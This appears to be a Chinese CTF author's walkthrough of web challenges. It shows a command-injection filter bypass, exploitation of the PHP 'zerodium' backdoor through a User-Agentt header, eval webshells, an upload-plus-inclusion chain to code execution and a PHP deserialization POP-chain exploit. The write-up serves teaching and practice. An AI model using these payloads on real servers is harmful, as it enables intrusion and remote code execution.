赣CTF-WEB-WP
赣CTF-WEB-WP
第一次出题,✌们轻喷~~~
由于综合渗透和__()()!!!不是我出的题,我就懒得写上了(对不起,是我太懒了),等出题人给wp吧
水果忍者~
出的JS小游戏签到题,看前端中的all.js文件,即可找到flag。
Ez_RCe
反引号命令执行
preg_match("/flag|cat|tac|system|\\$|\\.|\\\\|exec|pass/i")
这边过滤了许多关键字
我们知道在linux中反引号``也可以执行系统命令,只不过不会回显,需要我们打印出来。
可以看到根目录下存在flag,我们常用cat,tac读取,但是这里过滤了,所以我们用nl读取文件,flag被过滤用通配符绕过
payload:
POST:eval=echo `nl /f*`;
ikun的危险secret
在前端的game.js文件中找到secret,base64解密后=>"flag在哪我不知道,我只知道你这php版本很危险啊!!!"
根据提示查看php版本,可以在network中查看,也可以burp抓包后查看:
复制,右键,百度一搜
发现这个版本的php自带后门,找篇文章跟着复现一遍:
查看根目录下flag文件:
User-Agentt: zerodiumsystem('cat /f*');
提示在env中,直接执行env命令:
User-Agentt: zerodiumsystem('env');
在环境变量中可以看到flag
Array-Master
考查数组的强弱比较
==:弱比较
===:强比较
在弱比较下,数组只要键值对相同,即可判断为两个数组相等
在强比较下,数组不仅仅要键值对相同,还要顺序相同,才能判断为相等
所以这边:
if($c == $_POST['d'] && $c !== $_POST['d']){
echo "你就是ARRAY MASTER!!!</br>";
echo file_get_contents('/flag');
}
else{
echo "你就是ARRAY JOKER!!!";
}
!就是=的相反,所以我们要满足上述if条件,只需要保证我们传入的数组键值对的值跟$c相同,顺序不同即可
payload:
//前面的md5就用数组绕过
POST:a[]=1&b[]=2&d[1]=T&d[0]=C&d[2]=F&d[3]=E&d[4]=R
ez_信息收集
根据提示爬虫,知道访问robots.txt
看到有个gxngxngxn.php文件
访问,即可得到用户名和密码
## username: gxngxngxn
## password: Y0u_are_gr3at!
登录后跳转到 Y0u_Find_Me.php
右键查看页面源代码,提示flag变成雨滴落下
访问rain.js文件即可得到flag
ez_信息收集2.0
同样访问robots.txt,看到存在几百个文件(嘿嘿,我故意放这么多文件),根据提示说用户名和密码被放在了其中的一个文件里。
解法一(预期解):
写个python脚本,运用re库和request库来进行批量访问:
import requests
import re
url="http://47.76.55.63:21887/" #你的url
r1=requests.get(url+"robots.txt") #访问robots.txt
pattern = re.compile(r"Disallow:\s+([\w.]+\.txt)") #正则匹配 Disallow:后的文件名
matches = pattern.findall(r1.text)
for file_name in matches:
r2=requests.get(url+file_name) #逐个请求
if "username" in r2.text: #如果username在网页中,则打印出来网页内容
print(file_name+":"+r2.text)
break
可以看到用户名和密码被放到了szbge.txt中,剩余流程一样
解法二:
emmm,由于是洗了个澡后临时想到出的题,本意是想考察脚本编写,但是忘记了burp可以爆破了
大概流程就是把robots.txt下的文件名形成一个字典,导入burp的爆破模块,然后请求,看回显长度即可
解法三:
手动一个个访问,只要你有耐心,就不怕!!!!(懂了,下次我放几千个文件)
头像收集器
文件包含+文件上传结合,特殊的php标签
这边我设置的是可以任意上传文件,但是你上传后会发现我把他重命名为一堆数字了,同时给出了文件的绝对路径,然后点击再来一张,可以重新上传,但是注意观察路由,这时我们跳转到了/Try_Again.php?file=index.php,很明显是个文件包含,所以你可以把你上传文件的绝对路由放过去:
/Try_Again.php?file=/var/www/html/upload/xxxxxxx
就可以成功包含自己上传文件的内容,所以我们这里就可以上传个php一句话木马,例如:
<?php eval($_POST[0])?>
但是访问后你会发现,这里的?会被自动替换成!
那么我们需要上传一个不带?,但是可以被当成php执行的一句话木马,这里我故意将php版本设置为php5,就是为了让你们搜索发现;
<script language='php'>eval($_POST[0]);</script>
这个一句话木马可以被当成php解析,但是注意在php7后就被废除了
接下来就说上传,然后文件包含,然后rce (我太懒了,不想截图了,你们自己复现吧,对不起,呜呜呜~~)
HappyBot
反序列化+套娃+绕过
首先是一个机器人,右键页面源代码,要求我们get传参一个start,按照要求传参后即可得到源码:
<?php
error_reporting(0);
class o_o{
public $o;
public $O;
public $oO;
public $Oo;
public function __destruct(){
$char='0123456789abcdefghijklmnopqrstuvwsyzABCDEFGHIGKLMN';
$random=substr(str_shuffle($char),0,10);
$this->oO=$random;
if($this->Oo === $this->oO){
$this->O="gxngxngxn";
$this->o->O;
}
else{
echo "菜就多练,练多就不菜";
}
}
}
class o_0{
public $o;
public $o_o;
public function __get($o){
$this ->o="你确定是这里吗???";
($this->o_o)[$o]();
}
}
class oo_00{
private $oo;
public $OO;
protected $Oo;
public function __invoke(){
if(!is_array($this -> oo)){
if(preg_match('/^O_o$/i',$this->oo) && $this->oo != "O_o"){
echo new $this->Oo($this->OO);
}
else{
echo "尊嘟";
}
}
else{
echo "假嘟";
}
}
}
$O_o=$_GET['start'];
if(isset($O_o)){
highlight_file(__FILE__);
unserialize($_GET['尊嘟假嘟']);
}
else{
include "./zundu.html";
}
很简单的pop链子:
o_o :: __destruct -> o_0 :: __get -> oo_00 ::__invoke
首先我们看入口点:这里生成了10位数随机字符串并且赋值给了oO,那么要想进入下一步,就需要我们满足Oo===oO,那么这里肯定不是猜随机字符串(想都不敢想),这里我们可以用取地址&,将Oo的值赋值为oO的地址,这样两个值就相等了,也就进入了if路由,然后
赋值o=new o_0() 触发__get魔术方法
接着我们需要通过($this->o_o)[$o]() 来触发 oo_00类中的__invoke魔术方法
因为__get魔术方法是在读取不可访问或不存在属性的值的时候被触发,所以这里接收的就是那个不存在的属性
我们在$this->o->O这里属性O是o_0类中没有的,所以这里$o的值为O
所以我们只需要给$this->o_o赋值一个数组,让键"O"的值为new oo_00()即可
接着绕过preg_match('/^O_o$/i',$this->oo) && $this->oo != "O_o"
这里一搜一搜就知道用个%0a绕过即可
后面
echo new $this->Oo($this->OO);
这考察原生类反序列化,也是自己去搜一搜看看是啥吧
下面给出exp(前面的分析好累,早就不想写了):
<?php
class o_o{
public $o;
public $O;
public $oO;
public $Oo;
public function __construct(){
$this->Oo=&$this->oO;
}
}
class o_0{
public $o;
public $o_o;
}
class oo_00{
public $oo="O_o%0a";
public $OO="/f111111ag";
public $Oo="SplFileObject";
//这里直接读文件了,一开始你肯定不知道flag文件的名称,所以你需要运用别的原生类来得到flag名称,出题人太懒了,这里如何得到文件名的过程就不写了,不会的可以问问你们的学长。
}
$a=new o_o();
$a->o=new o_0();
$a->o->o_o=array("O"=>new oo_00());
echo serialize($a);
运行后生成:
O:3:"o_o":4:{s:1:"o";O:3:"o_0":2:{s:1:"o";N;s:3:"o_o";a:1:{s:1:"O";O:5:"oo_00":3:{s:2:"oo";s:6:"O_o%0a";s:2:"OO";s:10:"/f111111ag";s:2:"Oo";s:13:"SplFileObject";}}}s:1:"O";N;s:2:"oO";N;s:2:"Oo";R:10;}
这边你想直接传参吗,你可以去试试,然后会回显 “菜就多练,练多就不菜”
那么原因在哪呢,问题出在%0a是换行符的意思,在解析的过程中会被解析成一个字符,所以s:6:"O_o%0a"这里的个数应该是4,而不是6
那么手动改下:
O:3:"o_o":4:{s:1:"o";O:3:"o_0":2:{s:1:"o";N;s:3:"o_o";a:1:{s:1:"O";O:5:"oo_00":3:{s:2:"oo";s:4:"O_o%0a";s:2:"OO";s:10:"/f111111ag";s:2:"Oo";s:13:"SplFileObject";}}}s:1:"O";N;s:2:"oO";N;s:2:"Oo";R:10;}
再传参即可得到flag啦啦啦啦啦。